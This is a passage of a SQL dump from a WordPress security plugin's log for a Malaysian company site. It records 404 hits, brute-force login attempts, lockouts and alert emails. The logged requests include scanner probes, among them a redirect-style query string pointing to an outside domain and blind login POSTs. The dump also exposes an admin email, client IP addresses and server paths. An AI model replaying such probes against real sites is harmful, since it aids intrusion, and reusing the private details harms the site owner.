16:38:02',31242112,32694432,'https://bintara.com.my/wordpress/wp-login.php',1,0,'182.239.43.161'),(26762,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 16:38:03','2019-09-21 16:38:02',31866432,32694432,'https://bintara.com.my/wordpress/wp-login.php',1,0,'182.239.43.161'),(26763,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"14-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B33B0396-3B9D-43FA-B129-C66109B89042\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"14-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZflwOuEH7Zn-WPWRdTfgAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.141.84.237\";s:11:\"REMOTE_PORT\";s:5:\"49217\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZflwOuEH7Zn-WPWRdTfgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569087383.2209\";s:12:\"REQUEST_TIME\";s:10:\"1569087383\";}}','notice','2019-09-21 17:36:26','2019-09-21 17:36:23',31482464,33286096,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.141.84.237'),(26764,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"213-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"044BF116-0F7B-471E-B374-EDBD27A43A21\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"213-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZfpoRu5Nugk8c4xdWvuQAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"175.141.84.237\";s:11:\"REMOTE_PORT\";s:5:\"49324\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZfpoRu5Nugk8c4xdWvuQAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569087398.8967\";s:12:\"REQUEST_TIME\";s:10:\"1569087398\";}}','notice','2019-09-21 17:36:43','2019-09-21 17:36:39',31086024,32891568,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.141.84.237'),(26765,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/4B4932\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"94.249.167.197\";s:11:\"REMOTE_PORT\";s:5:\"55384\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZpEzkYtOEVzsOgB0KwOAAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569089811.204\";s:12:\"REQUEST_TIME\";s:10:\"1569089811\";}}','notice','2019-09-21 18:16:54','2019-09-21 18:16:51',31191488,33011144,'https://bintara.com.my/?page_id=18/contact.php',1,0,'94.249.167.197'),(26766,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=64baea9713a33a0d451351230eb945aa\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZqHwOuEH7Zn-WPWRdV0wAAAA4\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"117.53.152.104\";s:11:\"REMOTE_PORT\";s:5:\"33684\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZqHwOuEH7Zn-WPWRdV0wAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569090079.3099\";s:12:\"REQUEST_TIME\";s:10:\"1569090079\";}}','notice','2019-09-21 18:21:20','2019-09-21 18:21:19',31157464,32691592,'https://bintara.com.my/2019/wp-login.php',1,0,'117.53.152.104'),(26767,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 02:21:19\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 18:21:19\";s:14:\"lockout_expire\";s:19:\"2019-09-26 06:21:19\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 22:21:19\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 18:21:20','2019-09-21 18:21:19',31238896,32691592,'https://bintara.com.my/2019/wp-login.php',1,0,'117.53.152.104'),(26768,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 18:21:20','2019-09-21 18:21:19',31862320,32691592,'https://bintara.com.my/2019/wp-login.php',1,0,'117.53.152.104'),(26769,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=c34dda2f6fab7af9759f27fed0cdd402\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYaLkzkYtOEVzsOgB0K15wAAAIQ\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"111.90.140.100\";s:11:\"REMOTE_PORT\";s:5:\"53792\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYaLkzkYtOEVzsOgB0K15wAAAIQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569098643.2746\";s:12:\"REQUEST_TIME\";s:10:\"1569098643\";}}','notice','2019-09-21 20:44:05','2019-09-21 20:44:03',31156792,32692064,'https://bintara.com.my/wp/wp-login.php',1,0,'111.90.140.100'),(26770,0,'lockout','host-lockout::111.90.140.100','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"111.90.140.100\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 04:44:03\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 20:44:03\";s:14:\"lockout_expire\";s:19:\"2019-09-26 08:44:03\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 00:44:03\";s:12:\"lockout_host\";s:14:\"111.90.140.100\";}','action','2019-09-21 20:44:05','2019-09-21 20:44:03',31239024,32692064,'https://bintara.com.my/wp/wp-login.php',1,0,'111.90.140.100'),(26771,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"111.90.140.100\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 04:44:03\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 20:44:03\";s:14:\"lockout_expire\";s:19:\"2019-09-26 08:44:03\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 00:44:03\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 20:44:05','2019-09-21 20:44:03',31238976,32692064,'https://bintara.com.my/wp/wp-login.php',1,0,'111.90.140.100'),(26772,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 20:44:05','2019-09-21 20:44:03',31863112,32692064,'https://bintara.com.my/wp/wp-login.php',1,0,'111.90.140.100'),(26773,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:114:\"/?page_id=18%26error=different_domain%26back=http%3a%2f%2fvintageguitar.mobi%2f%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/4B4932\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:112:\"page_id=18%26error=different_domain%26back=http%3a%2f%2fvintageguitar.mobi%2f%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"94.249.167.197\";s:11:\"REMOTE_PORT\";s:5:\"54891\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYaNKfE1TXCA7p@bEOfouQAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569099049.9823\";s:12:\"REQUEST_TIME\";s:10:\"1569099049\";}}','notice','2019-09-21 20:50:51','2019-09-21 20:50:50',30806296,32615736,'https://bintara.com.my/?page_id=18%26error=different_domain%26back=http%3a%2f%2fvintageguitar.mobi%2f%26imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'94.249.167.197'),(26774,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/manager/ldskflks\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:43:\"https://www.bintara.com.my/manager/ldskflks\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/manager/ldskflks\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/manager/ldskflks\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYabePE1TXCA7p@bEOfwOAAAAVY\";s:12:\"REDIRECT_URL\";s:17:\"/manager/ldskflks\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"35982\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";